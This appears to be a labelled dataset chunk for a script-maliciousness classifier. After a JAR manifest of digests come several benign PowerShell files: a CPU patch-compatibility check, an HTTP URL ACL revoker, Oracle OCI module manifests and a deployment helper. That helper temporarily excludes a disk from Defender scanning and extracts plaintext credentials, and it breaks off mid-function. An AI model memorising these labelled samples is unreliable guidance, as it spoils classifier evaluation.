jAnnrVV64fzb3qpxLTaSgVwvcWwDYT53oPm+4Tpda2c= Name: script.js SHA-256-Digest: IHTktkz6w6F2GKad5HiS6BAjuXyvd+M8TbkEjfrBoJs= Name: com/microsoft/azure/toolkit/lib/legacy/appservice/class-use/Dock erImageType.html SHA-256-Digest: PkRIHWmmmVrUgGMEfVB715Beuij2fEWH90a0loAQogE= Name: com/microsoft/azure/toolkit/lib/appservice/model/package-summary .html SHA-256-Digest: 9W7NMPWw7NM8iH2hoPJOB26QkHcCWljxB3pluCqmNso= Name: com/microsoft/azure/toolkit/lib/appservice/function/impl/Default FunctionProject.html SHA-256-Digest: k4MfSOWNe+wewNpICWJ5k98dU+5ho62gOVLcAOHmh+c= Name: com/microsoft/azure/toolkit/lib/appservice/function/core/class-u se/AzureFunctionPackagerBase.html SHA-256-Digest: LAaXJqDsgxSyQNwMUscma7SQQXqZ6RytfSnXP+W0JDA= Name: com/microsoft/azure/toolkit/lib/appservice/function/FunctionsSer viceSubscription.html SHA-256-Digest: ef+qGMjECBENkKrYzTMt4T6aGM3ydaWeIlktCIPejPk= Name: com/microsoft/azure/toolkit/lib/legacy/function/template/Binding Configuration.html SHA-256-Digest: 2vDXYlHfSxLuuf1ipFiyU+qTq6HjbQB2PsEaCjL3IPU= Name: com/microsoft/azure/toolkit/lib/legacy/function/handlers/package -tree.html SHA-256-Digest: Er0/afrWN85936ZKyNP2XypscswdBhlswlHh7a6VQD8= Name: resources/x.png SHA-256-Digest: An8O0oMpY0vmRZMuGrfDIb8nuM+vmu0w8sv17kR4lSs= Name: com/microsoft/azure/toolkit/lib/appservice/model/class-use/CsmDe ploymentStatus.html SHA-256-Digest: c3HhNh+ZgkvSKLSL5kcvkHxOH6EFN6MpMQBpYDBECBM= Name: com/microsoft/azure/toolkit/lib/legacy/docker/IDockerCredentialP rovider.html SHA-256-Digest: waSe6Dr6SwbYaGn9QCfVjx1UWUwOXGGSDgRxhsPd4/A= Name: com/microsoft/azure/toolkit/lib/appservice/function/FunctionAppM odule.html SHA-256-Digest: 223PwCWExBNTJCTTYvu/8G7XDKhvI4JqV7aqdHkN/2o= Name: com/microsoft/azure/toolkit/lib/appservice/model/class-use/Tunne lStatus.html SHA-256-Digest: jFWjNuTR+ABVal/5ALNz9t+uEYgyxUUn+iSjNR22C9w= Name: serialized-form.html SHA-256-Digest: BIdh+KNwjRvNZZH0yQx4QMWWhUd4nuciH+oEbVu1WMQ= Name: com/microsoft/azure/toolkit/lib/appservice/model/class-use/AppSe rviceFile.html SHA-256-Digest: /XmQJDAWGfLZThdGDgi1AQGYBNKQxnwhMGuryO4CIrM= Name: com/microsoft/azure/toolkit/lib/appservice/function/core/Functio nMethod.html SHA-256-Digest: ag0yF4qi+wWsdQx8d2Ugau5oeJ7oSKzs5KiPqNWPRxc= Name: com/microsoft/azure/toolkit/lib/appservice/file/AppServiceKuduCl ient.html SHA-256-Digest: d91acLfDDsW4qA4yM4rPrnj0f7Xlra/slX2+at09I1g= Name: com/microsoft/azure/toolkit/lib/appservice/model/class-use/Proce ssInfo.html SHA-256-Digest: heWaeKwxasNBrvqGJUKsfU5VQfb4lV2cN7DXOA1FajU= Name: legal/jquery.md SHA-256-Digest: BxaUNoLGJP0vSbOnGKLtTWOG6HL+dB8cdZVzriRQnT4= Name: help-doc.html SHA-256-Digest: sQ/9llx3qRBgzkkgTUGUX3Owxrx6RFauHMoBuKivC+A= Name: jquery/external/jquery/jquery.js SHA-256-Digest: QWo7LDvxbWT2tbbQ97B53yJnYU3WhH/C8ycbRAkjPDc= Name: com/microsoft/azure/toolkit/lib/appservice/model/FlexConsumption Configuration.html SHA-256-Digest: wiaWzJHnKPk+DT81mbB6eLcpBAOFxTKcHEVH4JBhx4A= Name: com/microsoft/azure/toolkit/lib/appservice/utils/AppServiceConfi gUtils.html SHA-256-Digest: gLQ9X/b9vnJbchtlIQPBARagzyAQuSTRSEGtiS+Xz34= Name: com/microsoft/azure/toolkit/lib/appservice/function/class-use/Fu nctionsServiceSubscription.html SHA-256-Digest: TDRc2nWwou0i5To2L5AVTJe5zX7fgWug/sTyOTBBEok= Name: com/microsoft/azure/toolkit/lib/appservice/webapp/WebAppDeployme ntSlotDraft.Config.html SHA-256-Digest: feUkfEb0aAyTa/v57b/XvBk9E33lFlgGrYhMmgIq64Y= Name: com/microsoft/azure/toolkit/lib/appservice/task/package-summary. html SHA-256-Digest: hfbv0wZ5fcm9kfk7ZDuJ0FZB3VcKkGPN7sAjgxINvjw= Name: com/microsoft/azure/toolkit/lib/appservice/task/class-use/Deploy FunctionAppTask.html SHA-256-Digest: VUUGAlUuY9iSfCape8pflOG6lmPnCR1SwKkkulFkHbk= Name: com/microsoft/azure/toolkit/lib/appservice/function/package-summ ary.html SHA-256-Digest: /G0eZof3LeE3zW3+de/6o4tXSBH5pfQuHNtt3e2+08o= Name: com/microsoft/azure/toolkit/lib/appservice/function/FunctionAppD raft.html SHA-256-Digest: RXJk4mesFFuJSYmrLY32krAAh1onjTAbTxtKNOwP1Ys= Name: com/microsoft/azure/toolkit/lib/legacy/appservice/DeploymentSlot Setting.html SHA-256-Digest: P/8I6OZ2NbnvdZqTtQt9fmbmZ6xq7lReRupytq5OY8c= Name: type-search-index.zip SHA-256-Digest: FqwoU3VhmwRTfFee31Lzhg1itANNK1b0K0zc5COPg/Q= Name: com/microsoft/azure/toolkit/lib/appservice/file/AzureFunctionsAd minClient.html SHA-256-Digest: JyVvWjiZi7KLb/HwAaHICuc2o1hYsIWdjNSFJkGS4A0= Name: element-list SHA-256-Digest: h7C+CF7VrplHJ0Sb/KCfrBLjrCAZWil+FVn+YU290pg= Name: com/microsoft/azure/toolkit/lib/legacy/function/template/class-u se/FunctionTemplates.html SHA-256-Digest: q2AWzi8Ud5sq35FGKuXMHSCkQGZ7fIuusfGzYFbmsPM= Name: com/microsoft/azure/toolkit/lib/legacy/appservice/class-use/AppS erviceUtils.html SHA-256-Digest: ExGosroYwZHPtXI83XHlv7/frE4F+tHD9czaUONH/wc= Name: com/microsoft/azure/toolkit/lib/appservice/file/class-use/AzureF unctionsAdminClient.FunctionsService.html SHA-256-Digest: wlpMSjnhacE1xKh5JgsabZkXN9cC1DPaBK4q08Rpqic= Name: com/microsoft/azure/toolkit/lib/appservice/config/AppServiceConf ig.html SHA-256-Digest: mu3qQav3U9bLkYyUablzwOevlpxNIaipBhf6sZV0Tw0= Name: com/microsoft/azure/toolkit/lib/legacy/function/template/Templat eResources.html SHA-256-Digest: NzP/gkFDA0B7xPbTJ10yVRCaR1A13tRV0ZnHHZicYxg= Name: com/microsoft/azure/toolkit/lib/appservice/plan/package-summary. html SHA-256-Digest: QWST9R0NJ4y17xJo6V9EeHzLXehf7nYQAfsv58/7dj8= Name: com/microsoft/azure/toolkit/lib/appservice/plan/AppServicePlanDr aft.Config.html SHA-256-Digest: fjTdXuozIOHPxsF/SSUckY7439A6GS7DqwCmU0vL3BA= Name: overview-tree.html SHA-256-Digest: Sx/eI9lhp4RHXLGIbRJ+2DkxAdSnOibrBNjoeeGriH0= Name: com/microsoft/azure/toolkit/lib/appservice/deploy/RunFromBlobFun ctionDeployHandler.html SHA-256-Digest: dJo4YRZ2yGjh9l1zsKuYnCrutnuJzCuVNizxkB7bp2g= Name: com/microsoft/azure/toolkit/lib/appservice/config/package-summar y.html SHA-256-Digest: EOAmiWc9f9+dPYRNOUT98Ql2qU4o5CTgJgE+skS3BxI= Name: com/microsoft/azure/toolkit/lib/legacy/function/package-tree.htm l SHA-256-Digest: 7nCE+KpZ/s4RZDbaqi56u4dxgPbOn/dcWaAxdqoq3g4= Name: com/microsoft/azure/toolkit/lib/appservice/config/FunctionAppCon fig.html SHA-256-Digest: 9aVuHegPDf1c+sQ19QmCmPmkkBbW8AM7dL+z24QDrzk= Name: com/microsoft/azure/toolkit/lib/appservice/model/class-use/Funct ionDeployType.html SHA-256-Digest: 8d/NY90n5BjkENESMJyKx1amJfVrqxxF+TCKhpwZuHs= Name: com/microsoft/azure/toolkit/lib/appservice/function/class-use/Fu nctionAppDraft.html SHA-256-Digest: YjsP1PrlNWkIEP685QSAiEemiji2OJNIxro/lNQDJTM= Name: com/microsoft/azure/toolkit/lib/appservice/function/core/Functio nProject.html SHA-256-Digest: i+xjyhYuhAGLqan4uy1dDtigsrFwFyYYxyMWM35JV04= Name: com/microsoft/azure/toolkit/lib/appservice/config/package-use.ht ml SHA-256-Digest: FPoE84ASPXYdC6dSpj3JEYir8gYjNpCGihCkmSsTymw= Name: com/microsoft/azure/toolkit/lib/appservice/webapp/WebAppDeployme ntSlotDraft.html SHA-256-Digest: OvKkOwUFA/rvvTr/Uq5aayzuPnIP6p2ObV97RDYixcQ= Name: com/microsoft/azure/toolkit/lib/appservice/webapp/class-use/WebA pp.html SHA-256-Digest: Q/+d6s8uWaDmYTh+N9OYS9TFuJlp2mZH5aCGH2ulLVc= Name: com/microsoft/azure/toolkit/lib/appservice/task/DeployWebAppTask .html SHA-256-Digest: y87Z5p7p/pveLwOaB1yCTjK9q50sIVRvKde2LvVedmY= Name: com/microsoft/azure/toolkit/lib/legacy/function/handlers/Annotat ionHandler.html SHA-256-Digest: 6axSvkCzFayhqsaUcoaQ2XRP5IO1kh9X2l5d9ZeGW00= Name: com/microsoft/azure/toolkit/lib/appservice/task/class-use/Create OrUpdateWebAppTask.html SHA-256-Digest: W780eMvQMSscffqB+DuLm+kAWjKTUfd5GPzuTeQhZSY= Name: com/microsoft/azure/toolkit/lib/legacy/appservice/class-use/Depl oymentSlotSetting.html SHA-256-Digest: vykLh53scCkq1t3MHFO4kZem7iqhhPVYUvk4wPf1ymM= Name: package-search-index.zip SHA-256-Digest: PDtv0EnHekzjkAt3hPqlbs/JNuV84DySdyEKUPoK3DU= Name: jquery/jszip-utils/dist/jszip-utils-ie.js SHA-256-Digest: DOhExMICw1LjIQph/AkQA5pwcIRTsNtvKdTalJbycR4= Name: com/microsoft/azure/toolkit/lib/legacy/appservice/package-summar y.html SHA-256-Digest: JDPFT7EKY31cNY5YHwtpxehzjOEbhWgfIxvLiq3e3KY= Name: com/microsoft/azure/toolkit/lib/legacy/appservice/DockerImageTyp e.html SHA-256-Digest: PEdYKUzPSAIDXRAWk3aA8szl+0MkpXu9IY6g05Zl0ko= Name: com/microsoft/azure/toolkit/lib/appservice/model/PricingTier.htm l SHA-256-Digest: uc55RK2KAuZInBXoYVkXQzHKXyx2MtFFBMrVO7SZCrw= Name: type-search-index.js SHA-256-Digest: YUl7zPJtCk3LmX2vY1Ex3OAhJtbe0dCJkF1JiX4LkTk= Name: com/microsoft/azure/toolkit/lib/appservice/function/core/class-u se/FunctionMethod.html SHA-256-Digest: jRv49R2h5/0B53gsmz24dzpDwNldagxj+MYnOuYwh7E= Name: com/microsoft/azure/toolkit/lib/legacy/appservice/package-tree.h tml SHA-256-Digest: 4Euk7eGz6+LdG+x2ox5hKLaN/RM0HipzNa+GXPwoMIc= Name: com/microsoft/azure/toolkit/lib/appservice/model/class-use/Comma ndOutput.html SHA-256-Digest: QL5ChOCq90uCj8jAop39/UfXxVOFwP+RO11DuP7j9BY= Name: com/microsoft/azure/toolkit/lib/appservice/AppServiceServiceSubs cription.html SHA-256-Digest: /8r+DzowQDO6mkKbG4+lmHEhjn8XGfTYuMSNSmAz99A=
combined_dataset/train/non-malicious/4073.ps1
4073.ps1
[CmdletBinding()] param () $Processor = [string]((Get-WmiObject win32_processor).Caption) $Family = ($Processor.split(" ") | Where-Object { (($_ -notlike "*Intel*") -and ($_ -notlike "*x64*") -and ($_ -notlike "*Intel64*")) })[1] $Model = ($Processor.split(" ") | Where-Object { (($_ -notlike "*Intel*") -and ($_ -notlike "x64")) })[3] $Output = "Family: " + $Family Write-Output -InputObject $Output $Output = " Model: " + $Model Write-Output -InputObject $Output If ($Family -ge 6) { If ($Model -ge 42) { Write-Output -InputObject "Patch is compatible" Exit 0 } else { Write-Output -InputObject "Patch in incompatible due to old model" Exit 1 } } else { Write-Output -InputObject "Patch in incompatible due to old family" Exit 1 }
combined_dataset/train/non-malicious/1425.ps1
1425.ps1
function Revoke-CHttpUrlPermission { [CmdletBinding()] param( [Parameter(Mandatory=$true)] [string] $Url, [Parameter(Mandatory=$true)] [Alias('Identity')] [string] $Principal ) Set-StrictMode -Version 'Latest' Use-CallerPreference -Cmdlet $PSCmdlet -Session $ExecutionContext.SessionState $id = Resolve-CIdentity -Name $Principal if( -not $id ) { return } if( -not $Url.EndsWith('/') ) { $Url = '{0}/' -f $Url } $acl = Get-CHttpUrlAcl -LiteralUrl $Url -ErrorAction Ignore if( -not $acl ) { return } $currentAccess = $acl.Access | Where-Object { $_.IdentityReference -eq $id.FullName } if( $currentAccess ) { Write-Verbose -Message ('[{0}] [{1}] {2} ->' -f $Url,$id.FullName,$currentAccess.HttpUrlAccessRights) $acl.RemoveAccessRule($currentAccess) } }
combined_dataset/train/non-malicious/sample_18_41.ps1
sample_18_41.ps1
# # Module manifest for module 'OCI.PSModules.Redis' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Redis.dll' # Version number of this module. ModuleVersion = '79.0.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = 'bd4757ae-2cb1-4507-acfd-0f3be713db44' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Redis Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '79.0.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Redis.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Get-OCIRedisCluster', 'Get-OCIRedisClustersList', 'Get-OCIRedisWorkRequest', 'Get-OCIRedisWorkRequestErrorsList', 'Get-OCIRedisWorkRequestLogsList', 'Get-OCIRedisWorkRequestsList', 'Move-OCIRedisClusterCompartment', 'New-OCIRedisCluster', 'Remove-OCIRedisCluster', 'Stop-OCIRedisWorkRequest', 'Update-OCIRedisCluster' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Redis' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/sample_34_45.ps1
sample_34_45.ps1
# # Module manifest for module 'OCI.PSModules.Genericartifactscontent' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Genericartifactscontent.dll' # Version number of this module. ModuleVersion = '81.0.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = 'ae94c03a-b1fd-4547-8536-fbadc98c3ab2' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Genericartifactscontent Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '81.0.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Genericartifactscontent.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Get-OCIGenericartifactscontentGenericArtifactContent', 'Get-OCIGenericartifactscontentGenericArtifactContentByPath', 'Write-OCIGenericartifactscontentGenericArtifactContentByPath' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Genericartifactscontent' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/sample_44_80.ps1
sample_44_80.ps1
using module ..\Common\MountedImage.psm1 Import-Module -Name "$PSScriptRoot\..\..\Common\Helpers.psm1" Import-Module -Name "$PSScriptRoot\..\..\Common\NetworkHelpers.psm1" Import-Module -Name "$PSScriptRoot\..\..\Common\StorageHelpers.psm1" Import-Module -Name "$PSScriptRoot\RoleHelpers.psm1" Import-Module -Name "$PSScriptRoot\..\OEM\OEM.psm1" -DisableNameChecking function Get-MountedDisk { Get-Disk | Where-Object Manufacturer -like 'Msft*' | Where-Object Model -like 'Virtual Disk*' } function Dismount-MountedDisk { Get-MountedDisk | ForEach-Object { Dismount-DiskImage -DevicePath $_.Path } } function Get-MountedDiskDriveLetter { Get-MountedDisk | Get-Partition | ForEach-Object DriveLetter } function New-VhdFromWim { param ( [Parameter(Mandatory=$true)] [string] $VhdPath, [Parameter(Mandatory=$true)] [string] $WimPath, [Parameter(Mandatory=$true)] [int] $WimImageIndex, [uint64] $SizeBytes = 40GB, [string[]] $DismFeaturesToInstall, [string[]] $ServerFeaturesToInstall, # Specifies if the VHD will be used for VHD boot rather than a primary boot device. # Do not set this if your VHD is going to be a primary boot disk on a VM. [switch] $VhdBoot, [switch] $Force ) $ErrorActionPreference = [System.Management.Automation.ActionPreference]::Stop if (Test-Path $VhdPath) { # the other BVT disk (multi-node) is also a virtual disk but can not be dis-mounted (error will occur) # we have to target the only disk mapped to Vhd path Dismount-DiskImage -ImagePath $VhdPath if ($Force) { Remove-Item $VhdPath -Force } else { throw "VHD file $VhdPath already exists." } } # Try to start Hyper-V on the DVM $tryCount = 1 while (($tryCount -lt 4) -and ((Get-Service vmms).Status -ne "Running")) { Trace-Execution "Attempt #$tryCount to start VMMS on '$Env:COMPUTERNAME'" Start-Service vmms Start-Sleep 30 $tryCount++ } if ((Get-Service vmms).Status -ne "Running") { Trace-Error "Failed to start VMMS on $Env:COMPUTERNAME" } $null = New-VHD -SizeBytes $SizeBytes -Path $VhdPath -Dynamic $hwDetectionService = Get-Service -Name ShellHWDetection -ErrorAction Ignore if ($hwDetectionService) { Trace-Execution "Stopping ShellHWDetection Service" Stop-Service ShellHWDetection } else { Trace-Execution "ShellHWDetection Service was not running, no need to stop the service." } Trace-Execution "Mounting VHD from: $VhdPath" Mount-DiskImage -ImagePath $VhdPath # Attempt to start defender if not already running $service = Get-Service -Name "windefend" -ErrorAction SilentlyContinue if ($null -ne $service -and $service.Status -ine "Running") { $service | Start-Service -ErrorAction SilentlyContinue | Out-Null } try { $virtualDisk = Get-Disk | Where-Object Manufacturer -like 'Msft*' | Where-Object Model -like 'Virtual Disk*' | Where-Object PartitionStyle -like 'RAW' $diskNumber = $virtualDisk.Number Trace-Execution "Performing initialize on disk number: $diskNumber" Initialize-Disk -Number $diskNumber -PartitionStyle MBR $partition = New-Partition -DiskNumber $diskNumber -UseMaximumSize -AssignDriveLetter -IsActive if ($null -eq $partition) { throw "Failed to create new partition during the process of creating WinPE VHD from WIM." } $driveLetter = $partition.DriveLetter $driveName = $driveLetter + ':' $diskPath = $driveName + '\' $volume = Format-Volume -Partition $partition -FileSystem NTFS -Confirm:$false $null = New-PSDrive -PSProvider FileSystem -Root "FileSystem::$diskPath" -Name $driveLetter # set exclusion path when windefend is running if ($null -ne $service -and $service.Status -eq "Running") { Trace-Execution "Exclude mount folders $diskPath from Windows Defender scan to speed up configuration." Add-MpPreference -ExclusionPath $diskPath -ErrorAction SilentlyContinue } # Use a randomly generated log path because Expand-WindowsImage sometimes crashes because of not being able to write to default log file DISM.LOG. $dismLogPath = [IO.Path]::GetTempFileName() Trace-Execution "Using the following path for the DISM log: $dismLogPath" $null = Expand-WindowsImage -ImagePath $WimPath -ApplyPath $diskPath -Index $WimImageIndex -LogPath $dismLogPath if (-not $VhdBoot) { $null = bcdboot "$driveName\Windows" /S $driveName } } finally { if ($null -ne $service -and $service.Status -eq "Running") { Trace-Execution "Remove Windows Defender exclusions for paths $diskPath" Remove-MpPreference -ExclusionPath $diskPath -ErrorAction SilentlyContinue } Get-PSDrive | Where-Object Name -eq $driveLetter | Remove-PSDrive Dismount-DiskImage -ImagePath $VhdPath if ($hwDetectionService) { Start-Service ShellHWDetection Trace-Execution "Started ShellHWDetection Service" } else { Trace-Execution "ShellHWDetection Service was not previously running, no need to restart the service." } } if ($DismFeaturesToInstall) { Enable-WindowsOptionalFeature -FeatureName $DismFeaturesToInstall -Online -All } if ($ServerFeaturesToInstall) { Install-WindowsFeature -Vhd $VhdPath -Name $ServerFeaturesToInstall -IncludeAllSubFeature -IncludeManagementTools } } function New-WimFromVhd { param ( [Parameter(Mandatory=$true)] [string] $WimPath, [Parameter(Mandatory=$true)] [string] $VhdPath, [switch] $Force ) $ErrorActionPreference = [System.Management.Automation.ActionPreference]::Stop Dismount-MountedDisk if (Test-Path $WimPath) { if ($Force) { Remove-Item $WimPath -Force } else { throw "WIM file $WimPath already exists." } } try { Mount-DiskImage -ImagePath $VhdPath $driveLetter = Get-MountedDiskDriveLetter $null = New-WindowsImage -ImagePath $WimPath -CapturePath "$driveLetter`:" -Name "CPS Host Backup" } finally { Dismount-DiskImage -ImagePath $VhdPath } } <# $newVhdFromWimParameters = @{ VhdPath = 'C:\CloudDeployment\Images\AD-DNS-DHCP.vhdx' WimPath = 'C:\CloudDeployment\Images\install.wim' WimImageIndex = 4 # Full server ServerFeaturesToInstall = 'DHCP', 'DNS', 'AD-Domain-Services' } New-VhdFromWim @newVhdFromWimParameters -Force $newVhdFromWimParameters = @{ VhdPath = 'C:\CloudDeployment\Images\Host.vhdx' WimPath = 'C:\CloudDeployment\Images\install.wim' WimImageIndex = 4 # Full server SizeBytes = 100GB } New-VhdFromWim @newVhdFromWimParameters -Force #> #Enable-WindowsOptionalFeature -FeatureName Microsoft-Hyper-V-Offline, Microsoft-Hyper-V-Online -Online -all # Returns back username and password as array count 0 and 1 function Get-UsernameAndPassword { [CmdletBinding()] param ( [Parameter(Mandatory=$true)] [PSCredential] $Credential ) $networkCredential = $Credential.GetNetworkCredential() $username = $networkCredential.UserName # Replace any password single quotes with double quotes so that we dont break the powershell syntax $password = $networkCredential.Password.Replace("'","''") if (-not $networkCredential.Domain) { # Localhost is needed to create networkshares from winPE $username = 'Localhost\' + $networkCredential.UserName } elseif (-not $username.Contains('\')) { $username = $networkCredential.Domain + '\' + $networkCredential.UserName } $username $password } <# .Synopsis Function to output a path to a deploydirect file that is intended to run from a WinPE context on a booting machine. This must only run from the physical machine role. .Parameter DeployDirectPath The template deploydirect path. .Parameter UsePxeServerRole Whether the deployment script should attempt to communicate with the on-stamp PXE server or with the initial deployment DVM. .Parameter Parameters This object is based on the customer manifest. It contains the private information of the Key Vault role, as well as public information of all other roles. It is passed down by the deployment engine. .Example New-DeployDirect -DeployDirectPath "$PSScriptRoot\DeployDirect.ps1" -UsePxeServerRole $false -Parameters $Parameters This will customize the template deploy direct file using entries from the parameters object, and will use the IP of the DVM in various locations. #> function New-DeployDirect { [CmdletBinding()] param ( [Parameter(Mandatory=$true)] [String] $DeployDirectPath, [Parameter(Mandatory=$true)] [bool] $UsePxeServerRole, [Parameter(Mandatory=$false)] [PSCredential] $PXEAccountCredential, [Parameter(Mandatory=$false)] [PSCredential] $VHDShareAccountCredential, [Parameter(Mandatory=$true)] [CloudEngine.Configurations.EceInterfaceParameters] $Parameters, [Parameter(Mandatory=$false)] [bool] $UseVersionedWim = $true, [Parameter(Mandatory=$true)] [string] $HypervisorSchedulerType ) $ErrorActionPreference = [System.Management.Automation.ActionPreference]::Stop $cloudRole = $Parameters.Roles["Cloud"].PublicConfiguration $physicalMachinesRole = $Parameters.Roles["BareMetal"].PublicConfiguration $physicalMachinesRolePrivateInfo = $Parameters.Configuration.Role.PrivateInfo $securityInfo = $cloudRole.PublicInfo.SecurityInfo # # $PXEAccountCredential is the account used to write logs back to the PXE server or the DVM. It can be either specified by the caller of # this function, or (by default) the local administrator of the DVM. # # $VHDShareAccountCredential is the account used by WinPE to download the VHD to the local host. It can be either the local administrator of # the DVM, or an account specified by the caller of this function (mandatory when an on-stamp PXE server is used) # if ($UsePxeServerRole) { # For domain-joined PXE servers, using the local administrator is not an option, so credentials for both accounts must be specified if ($null -eq $PXEAccountCredential) { throw "Must specify PXEAccountCredential when using an on-stamp PXE server" } if ($null -eq $VHDShareAccountCredential) { throw "Must specify VHDShareAccountCredential when using an on-stamp PXE server" } } else { # For the DVM, we can use the local builtin administrator account, so explicit credentials are not needed $administratorUser = $securityInfo.LocalUsers.User | Where-Object Role -eq $physicalMachinesRolePrivateInfo.Accounts.BuiltInAdminAccountID if ($PXEAccountCredential -eq $null) { $PXEAccountCredential = $Parameters.GetCredential($administratorUser.Credential) } if ($VHDShareAccountCredential -eq $null) { $VHDShareAccountCredential = $Parameters.GetCredential($administratorUser.Credential) } } if ($UsePxeServerRole) { $pxeRole = $Parameters.Roles["PXE"].PublicConfiguration $pxeServerName = $pxeRole.Nodes.Node.Name $vmRoleDefinition = $Parameters.Roles["VirtualMachines"].PublicConfiguration $pxeNode = $vmRoleDefinition.Nodes.Node | Where-Object { $_.Name -eq $pxeServerName } $pxeIPAddress = @($pxeNode.NICs.NIC)[0].IPv4Address.Split("/")[0] } else { $deploymentMachineRole = $Parameters.Roles["DeploymentMachine"].PublicConfiguration $pxeIPAddress = $deploymentMachineRole.Nodes.Node.IPv4Address 